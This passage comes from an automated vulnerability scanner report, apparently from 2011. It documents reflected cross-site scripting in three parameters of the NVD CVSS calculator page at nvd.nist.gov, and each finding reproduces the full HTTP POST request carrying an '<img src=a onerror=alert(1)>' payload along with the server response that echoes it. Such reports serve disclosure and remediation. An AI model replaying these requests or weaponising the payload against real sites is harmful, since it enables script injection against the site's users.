The value -197b09<img src=a onerror=alert(1)>c114a31754d cannot be converted to a number.
</h1>
...[SNIP]...

1.12. http://nvd.nist.gov/cvss.cfm [RemediationLevelVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the RemediationLevelVar request parameter is copied into the HTML document as plain text between tags. The payload 6d0c9<img%20src%3da%20onerror%3dalert(1)>19caa74cac7 was submitted in the RemediationLevelVar parameter. This input was echoed as 6d0c9<img src=a onerror=alert(1)>19caa74cac7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-16d0c9<img%20src%3da%20onerror%3dalert(1)>19caa74cac7&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:18 GMT
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -16d0c9<img src=a onerror=alert(1)>19caa74cac7 cannot be converted to a number.
</h1>
...[SNIP]...

1.13. http://nvd.nist.gov/cvss.cfm [ReportConfidenceVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the ReportConfidenceVar request parameter is copied into the HTML document as plain text between tags. The payload 41d28<img%20src%3da%20onerror%3dalert(1)>e183273590e was submitted in the ReportConfidenceVar parameter. This input was echoed as 41d28<img src=a onerror=alert(1)>e183273590e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-141d28<img%20src%3da%20onerror%3dalert(1)>e183273590e

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:18 GMT
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -141d28<img src=a onerror=alert(1)>e183273590e cannot be converted to a number.
</h1>
...[SNIP]...

1.14. http://nvd.nist.gov/cvss.cfm [TargetDistributionVar parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the TargetDistributionVar request parameter is copied into the HTML document as plain text between tags. The payload 64e3c<img%20src%3da%20onerror%3dalert(1)>c220e7f3ec0 was submitted in the TargetDistributionVar parameter. This input was echoed as 64e3c<img src=a onerror=alert(1)>c220e7f3ec0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-164e3c<img%20src%3da%20onerror%3dalert(1)>c220e7f3ec0&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:15 GMT
Content-Length: 9586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -164e3c<img src=a onerror=alert(1)>c220e7f3ec0 cannot be converted to a number.
</h1>
...[SNIP]...

Report generated by XSS.CX Home at Wed Mar 16 20:47:21 CDT 2011.